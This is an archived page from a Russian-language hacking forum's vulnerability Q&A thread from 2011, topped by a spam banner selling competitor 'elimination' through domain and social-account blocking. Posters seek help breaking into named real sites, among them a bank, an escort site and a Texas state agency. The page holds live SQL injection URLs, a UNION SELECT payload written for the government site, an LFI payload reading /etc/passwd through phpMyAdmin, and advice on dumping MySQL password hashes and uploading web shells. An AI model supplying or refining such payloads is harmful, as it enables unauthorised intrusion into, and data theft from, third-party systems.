УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1832 из 2438

1832

Опции темы

Поиск в этой теме

Опции просмотра

#18311

17.10.2011, 15:46

Kuteke

Guest

Сообщений: n/a

Провел на форуме:
60692

Репутация: 6

Может кто-нибудь помощь с HTTP Verb Tampering. Я отправляю PUT, DELETE, OPTIONS и т.д. Но какая польза? Можно ли проникнуть в сайт? Спасибо.

P.S. В гугле копал, ничего не нашел про эксплуатацию(кроме обхода VBAAC, Гольцева..)

#18312

18.10.2011, 08:07

immortal_Ale

Guest

Сообщений: n/a

Провел на форуме:
598

Репутация: 0

Подскажите как узнать таблицы с колонками в MySQL 4.0.x ? всю ночь парился и не фига,просто сайт банка нашел с sql

#18313

18.10.2011, 08:14

ZARO

Познающий

Регистрация: 17.04.2009

Сообщений: 59

Провел на форуме:
401944

Репутация: 37

Отправить сообщение для ZARO с помощью ICQ

Цитата:

Сообщение от immortal_Ale

immortal_Ale said:
Подскажите как узнать таблицы с колонками в MySQL 4.0.x ? всю ночь парился и не фига,просто сайт банка нашел с sql

Колонки можно узнать, если есть вывод об ошибках, и есть имя таблицы у которой нужно узнать колонки. А таблицы никак не узнать, только брутом. Проверить, есть ли права на счему mysql, потом file_priv. Если есть права, то можно будет через into outfile попробовать залить, а если file_priv=N то можно будет хэши mysql юзеров вытащить и потом попытаться phpMyAdmin найти, чтобы авторизоваться

Цитата:

Сообщение от Kuteke

Kuteke said:
Может кто-нибудь помощь с HTTP Verb Tampering. Я отправляю PUT, DELETE, OPTIONS и т.д. Но какая польза? Можно ли проникнуть в сайт? Спасибо.
P.S. В гугле копал, ничего не нашел про эксплуатацию(кроме обхода VBAAC, Гольцева..)

Как я знаю, PUT, DELETE, OPTIONS ничего полезного не дадут. Иногда бывает в .htaccess т.е. Post запросы будут проходить.

#18314

18.10.2011, 15:01

Kuteke

Guest

Сообщений: n/a

Провел на форуме:
60692

Репутация: 6

http://ts.cityvibe[nogoogle].com/escorts.php?country=1[inj]&do=cityview

ORA-xxxx пишет. Значит Oracle? Раскрутите пожалуйста.

#18315

18.10.2011, 22:56

JustPauL

Guest

Сообщений: n/a

Провел на форуме:
223

Репутация: 0

Вопрос по phpmyadmin: Есть уязвимый для LFI сайт _www.someurl.com/phpmyadmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00

Долго пытался найти логи apach, но так и не смог, proc/self/environ тоже не доступен для чтения. Есть ли какие-нибудь другие способы залить шелл?

#18316

19.10.2011, 16:14

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

есть такой вопрос

http://xchats.ru/forum/xf.php?s=0&ci=1&id=0&pass=&mod=show&rid=1&page=0%2 7

смогу ли я влепить сюда свой запрос если уязвимый гет параметр передаётся в лимит? если да то как?

#18317

19.10.2011, 16:31

Boolean

Guest

Сообщений: n/a

Провел на форуме:
40748

Репутация: 78

Цитата:

Сообщение от qaz

qaz said:
есть такой вопрос
http://xchats.ru/forum/xf.php?s=0&ci=1&id=0&pass=&mod=show&rid=1&page=0%2 7
смогу ли я влепить сюда свой запрос если уязвимый гет параметр передаётся в лимит? если да то как?

Там нет инъекции.

Просто кривые руки.

В коде бы выглядело как-то так:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]"... LIMIT "[/COLOR][COLOR="#007700"]. (([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])*[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]", 10 .. "[/COLOR][/COLOR]

#18318

19.10.2011, 17:58

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Вот крутил как слепую, никак до ума довести не могу как выдрать логины.

Мож у Вас что получится ?

Код:

Code:
http://www.agd.state.tx.us/36id/storyquery.asp?ID=41+and+(select+count(user_name)+from+stories)=18+and+1=1

Забыл сказать, то что выше - это MsAccess

#18319

19.10.2011, 19:53

OxoTnik

Guest

Сообщений: n/a

Провел на форуме:
290351

Репутация: 173

Всем привет, дайте подсказку с Smf форумом, нету прав на запись в папку тем, как залить шелл?

#18320

19.10.2011, 20:19

Boolean

Guest

Сообщений: n/a

Провел на форуме:
40748

Репутация: 78

Цитата:

Сообщение от BigBear

BigBear said:
Вот крутил как слепую, никак до ума довести не могу как выдрать логины.
Мож у Вас что получится ?

Код:

Code:
http://www.agd.state.tx.us/36id/storyquery.asp?ID=41+and+(select+count(user_name)+from+stories)=18+and+1=1

Забыл сказать, то что выше - это
MsAccess

http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)and(1=2)union(select(1),(2),( 3),(4),(5),(6),(7),(8),(9),(10),(11),(12)from(stor ies)

Страница 1832 из 2438

1832

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход